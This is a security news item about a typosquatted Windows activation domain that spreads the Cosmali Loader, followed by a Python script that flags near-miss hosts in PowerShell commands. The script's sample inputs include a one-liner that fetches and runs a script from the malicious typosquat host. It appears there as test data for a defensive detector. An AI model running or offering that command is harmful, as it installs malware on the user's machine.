Typosquatted Windows Activator Domain Distributes Malicious PowerShell Loader

A fraudulent domain masquerading as the popular Microsoft Activation Scripts (MAS) tool is being used to infect users with a malicious PowerShell-based loader. The attackers registered the look-alike domain "get.activate[.]win," which differs by only one character from the legitimate "get.activated.win" address used in the official MAS instructions. By capitalizing on users mistyping that address, the campaign tricks them into executing harmful scripts that install the "Cosmali Loader" malware.

Infected users have reported receiving pop-up warnings on their systems, alerting them to the Cosmali Loader infection and advising them to check for suspicious PowerShell processes in Task Manager. Analysis reveals the malware is used to deploy cryptominers and the XWorm remote access trojan. It is believed a security researcher gained access to the malware's insecure control panel to send these warnings and notify victims.

MAS is an open-source tool for activating Windows and Office without a license, which Microsoft considers a piracy utility. Its maintainers have warned users about this campaign, urging them to verify commands before execution. This incident highlights the ongoing risk of malware distribution through typosquatted domains and unofficial activation tools, emphasizing the need for caution when running scripts from untrusted sources.
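The two domains named above, and the maintainers' advice to verify commands before running them, can be turned into a mechanical check. The following is an added example, not code from the article or from the MAS project: it pulls every URL out of a PowerShell command line, compares each host against an allowlist of legitimate hosts by edit distance, and flags near-misses such as a one-character typosquat. The allowlist contains only "get.activated.win" (from the page); the sample command lines are constructed and assume the MAS one-liner has the shape `irm <url> | iex`, which is an assumption of this example rather than a quotation from the page.

```python
import re
from urllib.parse import urlparse

# Legitimate MAS host as reported on the page; the campaign's typosquat is one
# character shorter ("get.activate.win"). Extend ALLOWED_HOSTS with whatever
# script sources your environment actually trusts.
ALLOWED_HOSTS = ("get.activated.win",)

# Matches an http(s) URL up to whitespace or common PowerShell delimiters.
URL_RE = re.compile(r"https?://[^\s'\"|;)]+", re.IGNORECASE)


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert/delete/substitute), iterative DP."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # delete ca
                           cur[j - 1] + 1,         # insert cb
                           prev[j - 1] + (ca != cb)))  # substitute / match
        prev = cur
    return prev[-1]


def classify_host(host: str, allowlist=ALLOWED_HOSTS, max_distance: int = 2) -> str:
    """'allowed' for an exact allowlist hit, 'typosquat-suspect ...' for a host
    within max_distance edits of an allowed host, otherwise 'unknown'."""
    host = host.lower().rstrip(".")
    if host in allowlist:
        return "allowed"
    for good in allowlist:
        d = levenshtein(host, good)
        if d <= max_distance:
            return f"typosquat-suspect (distance {d} from {good})"
    return "unknown"


def audit_command(cmdline: str):
    """Return [(host, verdict), ...] for every URL found in a command line.
    URLs without a parseable hostname are skipped."""
    results = []
    for url in URL_RE.findall(cmdline):
        host = urlparse(url).hostname
        if host:
            results.append((host.lower(), classify_host(host)))
    return results


if __name__ == "__main__":
    # Constructed sample command lines (not taken from the page).
    samples = [
        "irm https://get.activated.win | iex",   # legitimate host
        "irm https://get.activate.win | iex",    # one-character typosquat
        "irm https://example.invalid/x.ps1 | iex",  # unrelated host
    ]
    for cmd in samples:
        print(f"{cmd!r:48} -> {audit_command(cmd)}")
```

The distance threshold is deliberately small: a threshold of 1 or 2 catches single dropped, swapped or substituted characters while leaving genuinely unrelated hosts as "unknown", which is the right verdict for a host you have no opinion about. The same `audit_command` function can be run over PowerShell ScriptBlock or process-creation logs to surface near-miss hosts after the fact, not only before execution.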
